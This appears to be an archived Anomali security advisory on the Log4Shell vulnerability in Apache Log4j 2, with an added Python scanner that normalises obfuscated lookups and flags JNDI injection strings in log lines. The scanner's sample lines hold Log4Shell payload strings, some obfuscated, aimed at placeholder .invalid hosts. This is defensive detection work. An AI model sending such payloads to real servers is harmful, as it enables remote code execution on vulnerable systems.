Source |
Anomali |
Identifier |
3791723 |
Publication date |
2021-12-13 22:26:00 (viewed: 2021-12-13 23:05:46) |
Title |
Apache Log4j 2 Vulnerability Affects Numerous Companies, Millions of Users |
Text |
A critical vulnerability, registered as CVE-2021-44228 (Log4Shell), has been identified in Apache Log4j 2, an open source Java package used to provide logging.[1] The vulnerability was discovered by Chen Zhaojun of Alibaba in late November 2021, reported to Apache, and subsequently released to the public on December 10, 2021.[2]
The Apache Software Foundation (ASF) rates CVE-2021-44228 as a 10 on the Common Vulnerability Scoring System (CVSS) scale.[3] Log4Shell is a remote code execution (RCE) vulnerability that is exploited via improper deserialization of user input that is sent into the Log4j package framework.[4] Specifically, the vulnerability is located in the JNDI component of the LDAP connector.[5] A threat actor’s objective is to trick JNDI into connecting to a threat actor-controlled directory.[6] However, the exploitation reliability of Log4Shell is dependent on how the package is implemented.
Affected versions: log4j version 2.0-beta9 to version 2.14.1.
Attack Complexity: Low.
Privileges Required: None.
User Interaction: Not required.
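The detection side of the JNDI lookup described above, as an added example that is not part of the Anomali post: a small scanner that resolves the nested `${lower:...}`, `${upper:...}` and `${...:-x}` lookups Log4j evaluates before the JNDI string is assembled, then flags log lines that carry a `${jndi:...}` lookup. The log lines and `.invalid` hostnames are constructed for the example.

```python
import re

# Constructed sample log lines (not from the original post); hostnames use
# the reserved .invalid TLD so nothing here resolves.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:${lower:rmi}://example.invalid/b}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${::-j}ndi:dns://example.invalid/c}"',
]

# Innermost Log4j case lookups (${lower:x}, ${upper:x}) and default-value
# lookups (${anything:-x}); both are replaced by their literal result.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_case(match):
    value = match.group(2)
    return value.lower() if match.group(1).lower() == "lower" else value.upper()


def normalize_lookups(text):
    """Resolve nested case/default lookups, innermost first, until the text
    stops changing, so `${${lower:j}ndi:...}` becomes `${jndi:...}`.
    Every substitution shortens the text, so the loop always terminates."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(_resolve_case, text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def find_jndi_lookups(lines):
    """Return (line_number, normalized_line) for each line that carries a
    JNDI lookup once its surrounding lookups have been resolved."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        if _JNDI_LOOKUP.search(normalized):
            hits.append((number, normalized))
    return hits


if __name__ == "__main__":
    for number, text in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {number}: {text}")
```

A hit on the normalized text is a reason to inspect the request, not proof of compromise; whether the lookup was actually evaluated depends on the Log4j version and configuration of the receiving application, as the advisory notes.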
How Anomali Can Help
ThreatStream: The Anomali Threat Research team has released a ThreatStream dashboard “Log4Shell (CVE-2021-44228)” for tracking associated indicators, research articles, and vulnerable products (shown in the figure below).
Integrator: Customers can use Anomali Integrator to block specific IOCs in their downstream security integrations.
Match: Match can provide alerting and retrospective lookup capabilities to detect and contextualize matches for these indicators.
For more information, reach out to your Customer Success Manager.
Endnotes
[1] “CVE-2021-44228 Detail,” NVD NIST, accessed December 13, 2021, published December 10, 2021, https://nvd.nist.gov/vuln/detail/CVE-2021-44228; Free Wortley, et al., “Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package,” LunaSec, accessed December 13, 2021, published December 12, 2021, https://www.lunasec.io/docs/blog/log4j-zero-day/.
[2] Jake King and Samir Bousseaden, “Detecting Exploitation of CVE-2021-44228 (log4j2) with Elastic Security,” Elastic NV, accessed December 13, 2021, published December 10, 2021, https://www.elastic.co/blog/detecting-log4j2-with-elastic-security.
[3] “CVE-2021-44228 Detail,” NVD NIST.
[4] Jake King and Samir Bousseaden, “Detecting Exploitation of CVE-2021-44228 (log4j2) with Elastic Security,” Elastic NV.
[5] “Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild,” Cisco Talos Blog, accessed December 13, 2021, published December 10, 2021, https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html.
[6] Hans-Martin Münch, “Vulnerability Notes: Log4Shell,” Mogwai Labs, accessed December 13, 2021, published December 10, 2021, https://mogwailabs.de/en/blog/2021/12/vulnerability-notes-log4shell/?s=09. |
Sent |
Yes |
Tags |
Vulnerability
Threat
|